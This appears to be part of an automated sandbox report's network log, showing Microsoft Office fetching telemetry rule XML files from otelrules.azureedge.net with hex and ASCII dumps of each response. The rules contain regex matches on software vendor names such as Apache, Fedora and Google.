                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            51192.168.2.54977113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:29 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                            x-ms-request-id: 959a3585-901e-0067-5ae9-2eb5cb000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133929Z-17df447cdb5zfhrmhC1DFWh33000000002t000000000c3hn
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            52192.168.2.54977213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:30 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                            x-ms-request-id: 32bbde6d-701e-000d-0e01-2f6de3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133930Z-17df447cdb5tcj54hC1DFW3yew000000032g000000000bz5
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            53192.168.2.54977313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:30 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                            x-ms-request-id: d4ebd703-e01e-0085-25f6-2ec311000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133930Z-17df447cdb57g7m7hC1DFW791s00000002wg0000000060y6
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            54192.168.2.54977713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:30 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                            x-ms-request-id: 9919728d-d01e-002b-4b0b-2d25fb000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133930Z-16547b76f7fwvr5dhC1DFW2c9400000006hg00000000d80g
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            55192.168.2.54977613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:30 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                            x-ms-request-id: f3c8b028-b01e-003d-2400-2fd32c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133930Z-17df447cdb5vp9l9hC1DFW0nrw000000032g000000003w3h
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            56192.168.2.54978013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:30 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                            x-ms-request-id: 1a545004-b01e-0084-4b01-2fd736000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133930Z-17df447cdb5qt2nfhC1DFWeaa000000002rg00000000bq6f
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            57192.168.2.54978113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:30 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:30 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                            x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133930Z-16547b76f7f4k79zhC1DFWu9y000000006p000000000fnst
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            58192.168.2.54978213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:31 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                            x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133931Z-16547b76f7f2g4rlhC1DFWnx8800000006gg00000000egrh
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            59192.168.2.54978313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:31 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                            x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133931Z-16547b76f7fcrtpchC1DFW52e800000006ng00000000fwht
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
